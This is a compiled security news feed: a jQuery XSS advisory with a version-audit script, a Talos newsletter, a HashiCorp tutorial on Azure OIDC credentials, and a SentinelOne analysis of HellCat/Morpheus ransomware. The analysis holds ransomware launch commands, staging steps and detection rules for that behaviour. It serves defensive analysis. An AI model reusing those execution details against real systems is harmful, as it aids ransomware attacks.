"Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code," according to a GitHub advisory released for the flaw.

The problem was addressed in jQuery version 3.5.0 released in April 2020. A workaround for CVE-2020-11023 involves using DOMPurify with the SAFE_FOR_JQUERY flag set to sanitize the HTML string before passing it to a jQuery method.

As is typically the case, the advisory from CISA is lean on details about the specific nature of exploitation and the identity of threat actors weaponizing the shortcoming. Nor are there any public reports related to attacks that leverage the flaw in question.

That said, Dutch security firm EclecticIQ revealed in February 2024 that the command-and-control (C2) addresses associated with a malicious campaign exploiting security flaws in Ivanti appliances ran a version of jQuery that was susceptible to at least one of the three flaws, CVE-2020-11023, CVE-2020-11022, and CVE-2019-11358.

Pursuant to Binding Operational Directive (BOD) 22-01, Federal Civilian Executive Branch (FCEB) agencies are recommended to remediate the identified flaw by February 13, 2025, to secure their networks against active threats.
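A quick way to find where jQuery builds predating the 3.5.0 fix are still loaded, as an added example that is not from CISA or the jQuery project: it parses script references out of a page and maps each detected version to the three jQuery CVEs the article names (the fixed-in versions, 3.4.0 for CVE-2019-11358 and 3.5.0 for the two 2020 advisories, come from the jQuery release notes). The HTML is a constructed sample, and the version heuristic only covers builds whose URL carries the version.

```python
"""Audit a page's <script src> references for jQuery builds affected by
CVE-2020-11023 and the two related jQuery advisories the article mentions.

Added example; the HTML below is constructed, and the version-in-URL
heuristic only works for builds whose file name or CDN path carries the
version (an unversioned jquery.min.js is reported for manual follow-up).
"""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Release in which each advisory was fixed (jQuery 3.4.0 / 3.5.0 release notes).
FIXED_IN: Dict[str, Version] = {
    "CVE-2019-11358": (3, 4, 0),  # prototype pollution in jQuery.extend
    "CVE-2020-11022": (3, 5, 0),  # XSS via htmlPrefilter on untrusted HTML
    "CVE-2020-11023": (3, 5, 0),  # XSS via <option> elements in untrusted HTML
}

_SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# jquery-3.4.1.min.js, jquery-1.12.4.js, jquery-3.5.1.slim.min.js
_VERSION_IN_NAME = re.compile(
    r'(?:^|/)jquery-(\d+)\.(\d+)\.(\d+)(?:\.slim)?(?:\.min)?\.js(?:[?#].*)?$', re.I)
# .../ajax/libs/jquery/3.5.1/jquery.min.js (version as a CDN path segment)
_VERSION_IN_PATH = re.compile(
    r'/jquery/(\d+)\.(\d+)\.(\d+)/jquery(?:\.slim)?(?:\.min)?\.js(?:[?#].*)?$', re.I)
# jquery.min.js with no version anywhere in the URL
_UNVERSIONED = re.compile(r'(?:^|/)jquery(?:\.slim)?(?:\.min)?\.js(?:[?#].*)?$', re.I)


def is_jquery_build(src: str) -> bool:
    """True for URLs that look like the core jQuery library (not jquery-ui etc.)."""
    return any(p.search(src) for p in (_VERSION_IN_NAME, _VERSION_IN_PATH, _UNVERSIONED))


def jquery_version(src: str) -> Optional[Version]:
    """Parse (major, minor, patch) from the URL, or None if it carries no version."""
    for pattern in (_VERSION_IN_NAME, _VERSION_IN_PATH):
        match = pattern.search(src)
        if match:
            major, minor, patch = (int(g) for g in match.groups())
            return (major, minor, patch)
    return None


def applicable_cves(version: Version) -> List[str]:
    """Advisories that still apply to a build of the given version."""
    return [cve for cve, fixed in FIXED_IN.items() if version < fixed]


def audit_html(html: str) -> List[Dict[str, object]]:
    """One finding per jQuery script reference found in the page, in page order.

    Remediation is the same in every case: move to jQuery >= 3.5.0, or, until
    then, run untrusted HTML through DOMPurify with SAFE_FOR_JQUERY before it
    reaches .html()/.append() (the workaround from the advisory)."""
    findings: List[Dict[str, object]] = []
    for src in _SCRIPT_SRC.findall(html):
        if not is_jquery_build(src):
            continue
        version = jquery_version(src)
        if version is None:
            findings.append({"src": src, "version": None, "cves": [],
                             "note": "version not in URL; check the file header"})
        else:
            findings.append({"src": src, "version": ".".join(map(str, version)),
                             "cves": applicable_cves(version)})
    return findings


# Constructed sample page mixing a vulnerable CDN build, an old vendored copy,
# a fixed build, an unversioned copy and two non-jQuery scripts.
SAMPLE_HTML = """<html><head>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="/static/vendor/jquery-1.12.4.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/jquery-ui-1.12.1.min.js"></script>
<script src='/static/js/app.js'></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML):
        print(finding)
```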




from The Hacker News https://ift.tt/B9pwx6D
via IFTTT

Thursday, January 23, 2025

Everything is connected to security

Welcome to this week’s edition of the Threat Source newsletter.

Hello friends! Joe here again! I have just returned from the frozen northern tundra of Fargo, North Dakota. This was my first real visit to the frigid climates of the Midwest, and I have to say, they take cold to a new level. I was invited to present on cybersecurity at the 32nd Crop Insurance Conference, hosted by North Dakota State University (go Bisons!).

If you’re wondering why I or anyone would care to discuss cybersecurity in such a niche industry, the answer is simple: Everything is connected to security, even something you wouldn’t think would nominally matter. Agriculture and adjacent industries are roughly 6 percent of our GDP and account for about 10 percent of all U.S. jobs. The trillions of dollars that industry generates are targets for cyber-crime-motivated threat actors and nation-states who would seek to degrade it.

Agriculture is also a deeply underserved community and industry with regard to cybersecurity. And that’s both in general security literacy and security investments. So, I have a soft spot for folks up against threat actors who seek to exploit the most vulnerable, like agriculture industries. If the knowledge I can share will help them and their businesses stay more secure, it’s always worth it.

Pro-tip: If you ever find yourself at a conference, maybe to give a presentation, stay and listen beyond your time on the stage. For security conferences, sure, but for super niche or industry-specific conferences? Even better. I’m not a farmer or in agriculture, but I learned a lot in North Dakota. So, sit through other presentations – the further away from cyber security it is, the better. There’s more to this industry than malware analysis, threat actor cluster tracking, and incident response. For example, at this conference, I learned about climate change affecting agriculture, trade tariffs, agronomics, and insurance. You never know when that knowledge will pay dividends down the road for cybersecurity research. Stay curious, be a forever student, and keep learning.

The one big thing

Remember the old meme ‘Good luck, I’m behind seven proxies’? Well, it still holds up in this Talos blog post. Proxy chains are something that hit our radar as old as VPNFilter, back in 2018. It’s a smart way to do business if your obscurity is your primary goal. TOR or other proxy solutions may have weaknesses that expose your operations to risk, and that’s why they’re getting more and more crafty about it. And we’ve moved far past generic VPN services for obscurity. Network defenders can find themselves between a rock and a hard place forensically when determining malicious connections to their networks.

Why do I care?

This is always going to be a sore point for network defenders. Adversaries are absolutely going to use and abuse any kind of proxy service to launch their attacks from. It’s an absolute given. It goes off the rails when it’s your own employees too. As per the blog post “Organizations need to realize that attacks can come from anywhere, even the same IP space that your employees connect to their VPNs, so plan accordingly.”

So now what?

Using additional controls and forensic data is a must here. Identity and access management, combined with a mobile device management/application solution is key here. Control as much of your ecosystem as you absolutely can. This isn’t cheap, but it’s most certainly a step up from implementing MFA and hoping for the best.

Top security headlines of the week

  • Hold onto your seats – Mirai came in super-hot with a massive 5.6 Tbps DDoS attack. So far, the largest ever recorded. (Hacker News)
  • Here’s some sobering statistics about healthcare data breaches. “Between 2009 and 2023, 5,887 healthcare data breaches of 500 or more records were reported to OCR [sic] Office of Civil Rights. Those breaches have resulted in the exposure or impermissible disclosure of 519,935,970 healthcare records. That equates to more than 1.5x the population of the United States.” (HIPAA Journal)
  • Businesses are folding a lot more due to cyber-attacks, and mostly at small and medium-sized businesses, which absolutely jives with what we see at Talos. Ransomware cartels love to target the small business. Cyber Insurance may be the saving grace here. (Bloomberg Law)

Can’t get enough Talos?

  • My colleague Martin Lee did an amazing Net Academy series on threat intelligence 101. If you’re a NetAcad member, I highly suggest you watch it! And if not, sign up. It’s free!
  • In running the biggest scam ever, I still get to be on Talos podcasts. Listen to myself and my colleagues discuss crossword puzzles and why Pauly Shore gets a bad rap.

Upcoming events where you can find Talos 

Cisco Live EMEA (February 9-14, 2025) 
Amsterdam, Netherlands

Most prevalent malware files from Talos telemetry over the past week 



from Cisco Talos Blog https://ift.tt/MlOjUPq
via IFTTT

Experts Find Shared Codebase Linking Morpheus and HellCat Ransomware Payloads

Jan 23, 2025 | Ravie Lakshmanan | Threat Intelligence / Data Breach

An analysis of HellCat and Morpheus ransomware operations has revealed that affiliates associated with the respective cybercrime entities are using identical code for their ransomware payloads.

The findings come from SentinelOne, which analyzed artifacts uploaded to the VirusTotal malware scanning platform by the same submitter towards the end of December 2024.

"These two payload samples are identical except for victim specific data and the attacker contact details," security researcher Jim Walter said in a new report shared with The Hacker News.

Both HellCat and Morpheus are nascent entrants to the ransomware ecosystem, having emerged in October and December 2024, respectively.

A deeper examination of the Morpheus/HellCat payload, a 64-bit portable executable, has revealed that both samples require a path to be specified as an input argument.

They are both configured to exclude the \Windows\System32 folder from the encryption process, as well as a hard-coded list of extensions, namely .dll, .sys, .exe, .drv, .com, and .cat.

"An unusual characteristic of these Morpheus and HellCat payloads is that they do not alter the extension of targeted and encrypted files," Walter said. "The file contents will be encrypted, but file extensions and other metadata remain intact after processing by the ransomware."

Furthermore, Morpheus and HellCat samples rely on the Windows Cryptographic API for key generation and file encryption. The encryption key is generated through the BCrypt (CNG) API.

Barring encrypting the files and dropping identical ransom notes, no other system modifications are made to the affected systems, such as changing the desktop wallpaper or setting up persistence mechanisms.

SentinelOne said the ransom notes for HellCat and Morpheus follow the same template as Underground Team, another ransomware scheme that sprang forth in 2023, although the ransomware payloads themselves are structurally and functionally different.

"HellCat and Morpheus RaaS operations appear to be recruiting common affiliates," Walter said. "While it is not possible to assess the full extent of interaction between the owners and operators of these services, it appears that a shared codebase or possibly a shared builder application is being leveraged by affiliates tied to both groups."

The development comes as ransomware continues to thrive, albeit in an increasingly fragmented fashion, despite ongoing attempts by law enforcement agencies to tackle the menace.

"The financially motivated ransomware ecosystem is increasingly characterized by the decentralization of operations, a trend spurred by the disruptions of larger groups," Trustwave said. "This shift has paved the way for smaller, more agile actors, shaping a fragmented yet resilient landscape."

Data shared by NCC Group shows that a record 574 ransomware attacks were observed in December 2024 alone, with FunkSec accounting for 103 incidents. Some of the other prevalent ransomware groups were Cl0p (68), Akira (43), and RansomHub (41).

"December is usually a much quieter time for ransomware attacks, but last month saw the highest number of ransomware attacks on record, turning that pattern on its head," Ian Usher, associate director of Threat Intelligence Operations and Service Innovation at NCC Group, said.

"The rise of new and aggressive actors, like FunkSec, who have been at the forefront of these attacks is alarming and suggests a more turbulent threat landscape heading into 2025."




from The Hacker News https://ift.tt/bXfg75p
via IFTTT

Access Azure from HCP Terraform with OIDC federation

Storing long-lived Azure credentials poses a security risk. While HCP Terraform secures sensitive credentials as write-only variables, you must audit the usage of long-lived credentials to detect if they are compromised. Many organizations have a policy to block these types of credentials.

A more secure alternative is available for authentication: dynamic provider credentials on HCP Terraform. This feature allows Terraform to authenticate to Azure as a service principal through a native OpenID Connect (OIDC) integration. HCP Terraform obtains temporary credentials for each run, and discards the credentials when the run completes. These credentials allow you to call Azure APIs that the service principal has access to at runtime. These credentials are short-lived by design, so their usefulness to an attacker is limited.

In this blog post, we’ll explore dynamic credentials for Azure and walk you through the required steps to set this up for yourself.

Tutorial: Dynamic credentials for Azure

For this tutorial, you will use HCP Terraform to configure dynamic credentials for Azure by setting up a trust relationship between HCP Terraform and Azure (Entra ID). This configuration allows HCP Terraform to authenticate with Azure and obtain temporary credentials for provisioning resources.

Configuring dynamic provider credentials consists of three high-level steps:

  1. Set up a trust relationship between HCP Terraform and Azure.
  2. Configure Azure platform access.
  3. Configure resources on HCP Terraform to use dynamic credentials.

To follow this tutorial, you should:

  • Be authenticated to both Azure and HCP Terraform in your local terminal session
  • Have permissions to create an app registration and service principal in Entra ID
  • Have permissions to assign Azure RBAC roles for the service principal

Set up a trust relationship between HCP Terraform and Azure

To interact with Azure, Entra ID, and HCP Terraform you will need to use the azurerm, azuread, and tfe providers in your Terraform configuration:

terraform {
  required_providers {
    azuread = {
      source  = "hashicorp/azuread"
      version = "3.0.2"
    }

    azurerm = {
      source  = "hashicorp/azurerm"
      version = "4.14.0"
    }

    tfe = {
      source  = "hashicorp/tfe"
      version = "0.62.0"
    }
  }
}

provider "azuread" {}

provider "azurerm" {
  features {}

  subscription_id = "xxxxxxxxxx"
}

provider "tfe" {
  organization = "xxxxxxxxxx"
}

All three providers perform implicit authentication with the credentials available in the environment at runtime.

You’ll authenticate to Azure and Entra ID using the Azure CLI. For guidance on setting up the Azure CLI, refer to the Azure CLI documentation. While there are alternative methods to authenticate to Azure and Entra ID, we prefer using the Azure CLI for its simplicity. For more details, check the documentation for the Azure or Entra ID providers.

Begin by creating an application in Entra ID and a corresponding service principal:

resource "azuread_application" "hcp_terraform" {
  display_name = "hcp-terraform-azure-oidc"
}

resource "azuread_service_principal" "hcp_terraform" {
  client_id = azuread_application.hcp_terraform.client_id
}

Below, you’ll start by establishing an OIDC trust relationship using a federated identity credentials resource. This resource is configured with an audience (api://AzureADTokenExchange), an issuer (https://app.terraform.io) and a subject.

A subject has the following format that includes details from your HCP Terraform environment:

organization:<name>:project:<name>:workspace:<name>:run_phase:<operation>

Below is a specific example of a plan operation in an HCP Terraform organization named “my-organization”. Also included is an example project named "my-project" and a workspace named "my-workspace":

organization:my-organization:project:my-project:workspace:my-workspace:run_phase:plan

It is a good practice to use a federated credential for a single purpose. It's also possible to use different service principals for Terraform plan and apply operations.

In this tutorial we use a single service principal with two different federated credentials, one for plan operations and one for apply operations.

First, you need to create federated credentials for the workspace’s plan operations:

# data source to reference the current hcp terraform organization
data "tfe_organization" "current" {}

resource "azuread_application_federated_identity_credential" "plan" {
  application_id = azuread_application.hcp_terraform.id
  display_name   = "${azuread_application.hcp_terraform.display_name}-plan"
  audiences      = ["api://AzureADTokenExchange"]
  issuer         = "https://app.terraform.io"
  description    = "For HCP Terraform plan operations"

  subject = join(":", [
    "organization",
    data.tfe_organization.current.name,
    "project",
    tfe_project.default.name,
    "workspace",
    tfe_workspace.default.name,
    "run_phase",
    "plan"
  ])
}

Next, create federated credentials for the workspace’s apply operations:

resource "azuread_application_federated_identity_credential" "apply" {
  application_id = azuread_application.hcp_terraform.id
  display_name   = "${azuread_application.hcp_terraform.display_name}-apply"
  audiences      = ["api://AzureADTokenExchange"]
  issuer         = "https://app.terraform.io"
  description    = "For HCP Terraform apply operations"

  subject = join(":", [
    "organization",
    data.tfe_organization.current.name,
    "project",
    tfe_project.default.name,
    "workspace",
    tfe_workspace.default.name,
    "run_phase",
    "apply"
  ])
}

Configure Azure platform access

The Azure service principal currently has no permissions to perform any actions on Azure.

You should provide the service principal with one or more Azure RBAC roles. These allow it to perform the actions required by the Terraform configuration where it will be used.

For the purpose of this demo, give the service principal the built-in Storage Account Contributor role to allow it to create and manage storage accounts on Azure. You will also set up a custom role to allow it to create resource groups on Azure.

Our custom Resource Group Creator role is defined and assigned to the service principal like this:

# data source for the current azure subscription
data "azurerm_subscription" "current" {}

resource "azurerm_role_definition" "resource_group_creator" {
  name  = "Resource Group Creator"
  scope = data.azurerm_subscription.current.id

  permissions {
    actions = [
      "*/read",
      "Microsoft.Resources/subscriptions/resourceGroups/write",
    ]
  }

  assignable_scopes = [
    data.azurerm_subscription.current.id,
  ]
}

resource "azurerm_role_assignment" "resource_group_creator" {
  scope              = data.azurerm_subscription.current.id
  principal_id       = azuread_service_principal.hcp_terraform.object_id
  role_definition_id = azurerm_role_definition.resource_group_creator.role_definition_resource_id
}

Similarly, assigning the Storage Account Contributor role to the service principal on the Azure subscription scope is done like this:

resource "azurerm_role_assignment" "storage_account_contributor" {
  scope                = data.azurerm_subscription.current.id
  principal_id         = azuread_service_principal.hcp_terraform.object_id
  role_definition_name = "Storage Account Contributor"
}

Configure resources on HCP Terraform to use dynamic credentials

First, we create the HCP Terraform project and workspace that will use the dynamic credentials. Alternatively, feel free to use an existing project in your organization.

resource "tfe_project" "default" {
  name = "demo-project"
}

resource "tfe_workspace" "default" {
  name       = "demo-workspace"
  project_id = tfe_project.default.id
}

When using dynamic provider credentials, there’s no need to include authentication configuration in the provider block of your Terraform configuration. However, you must tell the HCP Terraform workspace that dynamic credentials should be generated.

Do this by configuring the appropriate environment variables in the workspace: set TFC_AZURE_PROVIDER_AUTH to true and TFC_AZURE_RUN_CLIENT_ID to the client ID of the service principal that HCP Terraform should use for authentication during runtime.

resource "tfe_variable" "tfc_azure_provider_auth" {
  key             = "TFC_AZURE_PROVIDER_AUTH"
  value           = "true"
  category        = "env"
  workspace_id    = tfe_workspace.default.id
}

resource "tfe_variable" "tfc_azure_run_client_id" {
  sensitive       = true
  key             = "TFC_AZURE_RUN_CLIENT_ID"
  value           = azuread_service_principal.hcp_terraform.client_id
  category        = "env"
  workspace_id    = tfe_workspace.default.id
}

Once configured, HCP Terraform automatically retrieves temporary credentials for the service principal and injects them via the workspace environment variables, allowing you to focus on building infrastructure without the need to manage authentication.

Using dynamic provider credentials

Now you’re ready to use the established trust relationship to provision resources on Azure.

Using dynamic provider credentials, there’s no need to define anything within the provider itself. By sharing the variable set containing the Azure service principal information with an HCP Terraform workspace, you automatically provide that workspace with access to Azure.

HCP Terraform does this by interacting with Azure (Entra ID to be specific) at runtime to obtain temporary credentials using the environment variables from the shared variable set. This allows you to securely scale access management within HCP Terraform by delegating access from one workspace to another while precisely restricting Azure access to only what the service principal needs.

Using the service principal created earlier, which has been assigned the Storage Account Contributor role and a custom Resource Group Creator role, you can begin creating infrastructure on Azure.

A sample Terraform configuration that can be deployed from HCP Terraform using the established trust relationship is shown below. Note that the subject you configured for the federated credentials must match the organization, project, and workspace names where you deploy this configuration from.

provider "azurerm" {
  features {}
  use_cli = false

  subscription_id = "xxxxxxx"
  tenant_id       = "xxxxxxx"
}

resource "random_string" "suffix" {
  length  = 10
  upper   = false
  special = false
}

resource "azurerm_resource_group" "default" {
  name     = "rg-demo-${random_string.suffix.result}"
  location = "westeurope"
}

resource "azurerm_storage_account" "test" {
  name                = "st${random_string.suffix.result}"
  resource_group_name = azurerm_resource_group.default.name
  location            = azurerm_resource_group.default.location

  account_tier             = "Standard"
  account_replication_type = "LRS"
}
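The exact-match nature of that subject is easy to see by replaying the three federated-credential checks Entra ID applies to a run token (issuer, audience, subject), as an added example that is not HashiCorp or Microsoft code: it builds the subject the same way the tutorial's join(":", ...) expression does, and shows that a plan-phase token is rejected by the apply credential and that a renamed workspace breaks the trust. The token is a constructed, unsigned JWT; signature validation against the issuer's published keys is assumed to have passed already and is not modelled.

```python
"""Replay the checks Entra ID applies to an HCP Terraform run token before it
hands out a service principal credential: issuer, audience, exact subject, expiry.

Added example. Tokens are constructed and unsigned; signature verification
against the issuer's published keys is assumed to have passed and is not modelled.
"""
import base64
import json
import time
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

HCP_TERRAFORM_ISSUER = "https://app.terraform.io"
TOKEN_EXCHANGE_AUDIENCE = "api://AzureADTokenExchange"


def run_subject(organization: str, project: str, workspace: str, run_phase: str) -> str:
    """Same layout as the tutorial's join(":", [...]) subject expression."""
    return ":".join(["organization", organization, "project", project,
                     "workspace", workspace, "run_phase", run_phase])


@dataclass(frozen=True)
class FederatedCredential:
    """The trust fields of azuread_application_federated_identity_credential."""
    display_name: str
    subject: str
    issuer: str = HCP_TERRAFORM_ISSUER
    audiences: Tuple[str, ...] = (TOKEN_EXCHANGE_AUDIENCE,)


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_unsigned_token(claims: Dict[str, object]) -> str:
    """Constructed test token: header.payload. with an empty signature part."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}."


def token_claims(token: str) -> Dict[str, object]:
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    return json.loads(_b64url_decode(parts[1]))


def match_credential(token: str, credentials: List[FederatedCredential],
                     now: Optional[float] = None) -> Optional[FederatedCredential]:
    """Return the first credential the token satisfies, or None.

    Every comparison is exact: there is no wildcard in the subject, so the
    organization, project and workspace names in the token must be the ones
    baked into the credential, and a plan token never fits an apply credential."""
    claims = token_claims(token)
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        return None
    aud = claims.get("aud")
    audiences = [aud] if isinstance(aud, str) else list(aud or [])
    for cred in credentials:
        if claims.get("iss") != cred.issuer:
            continue
        if not any(a in cred.audiences for a in audiences):
            continue
        if claims.get("sub") != cred.subject:
            continue
        return cred
    return None


# Constructed trust configuration: the tutorial's two credentials, one per phase.
ORG, PROJECT, WORKSPACE = "my-organization", "my-project", "my-workspace"
CREDENTIALS = [
    FederatedCredential("hcp-terraform-azure-oidc-plan", run_subject(ORG, PROJECT, WORKSPACE, "plan")),
    FederatedCredential("hcp-terraform-azure-oidc-apply", run_subject(ORG, PROJECT, WORKSPACE, "apply")),
]
NOW = 1_737_700_000  # fixed clock so the outcome is reproducible


def token_for(run_phase: str, workspace: str = WORKSPACE,
              audience: str = TOKEN_EXCHANGE_AUDIENCE, ttl: int = 900) -> str:
    """Constructed run token; only the claims the checks use are included."""
    return make_unsigned_token({
        "iss": HCP_TERRAFORM_ISSUER, "aud": audience,
        "sub": run_subject(ORG, PROJECT, workspace, run_phase),
        "iat": NOW, "exp": NOW + ttl,
    })
```

Call match_credential(token_for("apply", workspace="my-workspace-v2"), CREDENTIALS, now=NOW) to see the renamed-workspace case come back as None.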

Dynamic provider credentials at scale

To scale the solution described above, we recommend a pattern where one or more HCP Terraform workspaces configure dynamic provider credentials for other workspaces. This enables the platform team to create HCP Terraform workspaces with pre-configured Azure authentication, scoped to specific service principals, per team.

Create an HCP Terraform variable set for each workspace, as described in the discussion above. The variable set for each workspace has two environment variables. These are the same two environment variables from the demo above: TFC_AZURE_PROVIDER_AUTH and TFC_AZURE_RUN_CLIENT_ID. These credentials are injected into the provider to grant access to any Azure API permitted by the service principal’s permissions.

Below is an example configuration of a variable set for a team (e.g. “Team A”).

First, create the variable set:

resource "tfe_variable_set" "oidc_team_a_dev" {
  name         = "oidc-team-a-dev"
  description  = "OIDC federation configuration for team A (dev)"
  organization = "XXXXXXXXXXXXXXX"
}

Next, set up the required environment variables and link them to the variable set:

resource "tfe_variable" "tfc_azure_provider_auth" {
  key             = "TFC_AZURE_PROVIDER_AUTH"
  value           = "true"
  category        = "env"
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
}

resource "tfe_variable" "tfc_azure_run_client_id" {
  sensitive       = true
  key             = "TFC_AZURE_RUN_CLIENT_ID"
  value           = azuread_service_principal.team_a_dev.client_id
  category        = "env"
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
}

Finally, share the variable set with Team A by connecting it to their development workspace. This ensures that the targeted workspace receives and uses the environment variables, allowing HCP Terraform to automatically obtain and inject the temporary credentials:

resource "tfe_workspace_variable_set" "oidc_team_a_dev" {
  variable_set_id = tfe_variable_set.oidc_team_a_dev.id
  workspace_id    = "ws-XXXXXXXXXXXXXXX"
}

Set up similar resources for each team that should have access to Azure. You will also need to configure Azure RBAC permissions for each service principal.

Learn more about OIDC federation using Microsoft Entra ID

For more on how to securely access Azure from HCP Terraform with OIDC federation, check out Use dynamic credentials with the Azure provider and the OIDC federation documentation. Find a more complete example of configuring the Azure OIDC identity provider on GitHub.



from HashiCorp Blog https://ift.tt/edTFKkU
via IFTTT

HellCat and Morpheus | Two Brands, One Payload as Ransomware Affiliates Drop Identical Code

The previous six months have seen heightened activity around new and emerging ransomware operations. Across the tail-end of 2024 and into 2025, we have seen the rise of groups such as FunkSec, Nitrogen and Termite. In addition, we have seen the return of Cl0p and a new version of LockBit (aka LockBit 4.0).

Within this period of accelerated activity, the Ransomware-as-a-Service offerings HellCat and Morpheus have gained additional momentum and notoriety. Operators behind HellCat, in particular, have been vocal in their efforts to establish the RaaS as a ‘reputable’ brand and service within the crimeware economy.

As a result of this recent activity, we analyzed payloads from both HellCat and Morpheus ransomware operations. In this post, we discuss how affiliates across both operations are compiling payloads that contain almost identical code. We take a high-level look at two samples in particular and examine their characteristics and behavior.

HellCat Overview

HellCat Ransomware emerged in mid-2024. The primary operators behind HellCat are high-ranking members of the BreachForums community and its various factions. These personas, including Rey, Pryx, Grep and IntelBroker, have been affiliated with the breaches of numerous high-value targets.

HellCat has leaned heavily into the public side of their persona with novel ransom demands and direct media coverage to drive their position within the ransomware landscape. By their own admissions, HellCat operators are focused on high-value “big game” targets and government entities.

Morpheus Overview

Morpheus RaaS launched a data leaks site (DLS) in December 2024, though the group’s activity can be tracked back to at least September. Morpheus functions as a semi-private RaaS, and its public branding efforts are far less visible than HellCat’s.

At the time of writing, Morpheus has listed two victims in the pharmaceutical and manufacturing industries. The affiliate discussed below currently targets Italian organizations with a focus on virtual ESXi environments. Ransom demands from Morpheus affiliates are known to reach as high as 32BTC (~$3 million USD as of this writing).

An Affiliate in Common

In late December 2024, our research team observed two similar ransomware payloads uploaded to VirusTotal on December 22 and December 30.

SHA1                                      Filename           Uploaded
f86324f889d078c00c2d071d6035072a0abb1f73  100M.exe           December 22, 2024
b834d9dbe2aed69e0b1545890f0be6f89b2a53c7  100M_redacted.exe  December 30, 2024

Both files were uploaded to VirusTotal via the web interface from a user that was not signed in and bear the same submitter ID. Based on this and other telemetry data, we believe it is likely that the samples were uploaded by the same affiliate dabbling in both Morpheus and HellCat campaigns.

HellCat VirusTotal Submission
Morpheus VirusTotal Submission

These two payload samples are identical except for victim specific data and the attacker contact details.

Zoomed out comparison of payload binaries (differences highlighted)
Zoomed in comparison of payload binaries (differences highlighted)

Payload Behavior

The Morpheus/HellCat payload is a standard 64-bit PE file. Both samples are ~18KB in size. Execution of the payload requires that a path be provided as an argument. The ww argument is also accepted, and this was the parameter used by the affiliate associated with these samples.

encryptor.exe ww
encryptor.exe {path}

A further file named er.bat was uploaded to VirusTotal with the same submitter ID on December 31, 2024 and gives us a glimpse into how the Morpheus sample was executed on target systems. er.bat (SHA1: f62d2038d00cb44c7cbd979355a9d060c10c9051) contains multiple copy commands, followed by execution of the ransomware.

er.bat launches Morpheus ransomware

Other files referenced in er.bat are associated with nginx (web server) and various Trend Micro products. The script copies these items from a network share to the local C:\users\public\ folder, followed by execution of the Morpheus ransomware with the ww parameter.

Both the HellCat and Morpheus samples are built with a hard-coded list of extensions to exclude from the encryption process:

  • .dll
  • .sys
  • .exe
  • .drv
  • .com
  • .cat

Additionally, the ransomware excludes the \Windows\System32 folder from encryption.

Upon launch, the payload processes files in the targeted path. An unusual characteristic of these Morpheus and HellCat payloads is that they do not alter the extension of targeted and encrypted files. The file contents will be encrypted, but file extensions and other metadata remain intact after processing by the ransomware.

HellCat-encrypted files, no extension change

The Morpheus and HellCat samples use the Windows Cryptographic API for key generation and file encryption. BCrypt is used to generate an encryption key, followed by encryption of the contents of the file. Similar approaches to encryption (using the Windows Cryptographic API) have been taken in the past by early versions of LockBit and ALPHV and many others.

HellCat key generation via BCrypt

BCryptEncrypt is then used to encrypt the contents of each file processed.

BCrypt / Windows Crypto use in HellCat/Morpheus

There are no further system modifications made beyond the file encryption and ransom note drop (no wallpaper change, scheduled tasks, or persistence mechanisms).

For both Morpheus and HellCat, the ransom note is written to disk as _README_.txt. Once all available files, on all available volumes, have been processed, the ransom note is launched via notepad from the C:\Users\Public\_README_.txt instance of the file.
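The two host behaviours the write-up describes, a binary staged in C:\Users\Public launched with the bare ww argument (the er.bat pattern) and notepad.exe opening _README_.txt, are enough to write simple process-creation rules. The block below is an added illustration, not SentinelOne code or detection content; the pipe-delimited event lines are constructed telemetry, and the field layout is an assumption.

```python
import re

# Constructed process-creation telemetry (not real logs): time|image path|command line|parent image
SAMPLE_EVENTS = """\
10:01:03|C:\\Windows\\System32\\cmd.exe|cmd.exe /c er.bat|C:\\Windows\\explorer.exe
10:01:04|C:\\Users\\Public\\encryptor.exe|encryptor.exe ww|C:\\Windows\\System32\\cmd.exe
10:01:05|C:\\Program Files\\Vendor\\svc.exe|svc.exe ww|C:\\Windows\\System32\\services.exe
10:07:40|C:\\Windows\\System32\\notepad.exe|notepad C:\\Users\\Public\\_README_.txt|C:\\Users\\Public\\encryptor.exe
10:08:12|C:\\Windows\\System32\\notepad.exe|notepad C:\\Users\\bob\\todo.txt|C:\\Windows\\explorer.exe
"""

PUBLIC_DIR = re.compile(r"^c:\\users\\public\\", re.IGNORECASE)
README_NOTE = re.compile(r"\\_README_\.txt\b", re.IGNORECASE)

def parse_events(text):
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts, image, cmdline, parent = line.split("|", 3)
            rows.append({"ts": ts, "image": image, "cmdline": cmdline, "parent": parent})
    return rows

def rule_ww_from_public(ev):
    """Binary staged in C:\\Users\\Public launched with 'ww' as its only argument."""
    args = ev["cmdline"].split()
    return bool(PUBLIC_DIR.match(ev["image"])) and len(args) == 2 and args[1].lower() == "ww"

def rule_note_via_notepad(ev):
    """notepad.exe opening _README_.txt, the note filename used by both payloads."""
    return ev["image"].lower().endswith("\\notepad.exe") and bool(README_NOTE.search(ev["cmdline"]))

RULES = {"ransomware-ww-from-public": rule_ww_from_public,
         "ransom-note-via-notepad": rule_note_via_notepad}

def detect(text):
    """Returns (timestamp, rule name) for every event matching a rule, in log order."""
    hits = []
    for ev in parse_events(text):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev["ts"], name))
    return hits

def escalate(hits):
    """Both behaviours in one host's log: the note only appears after encryption has finished."""
    return {"ransomware-ww-from-public", "ransom-note-via-notepad"} <= {n for _, n in hits}
```

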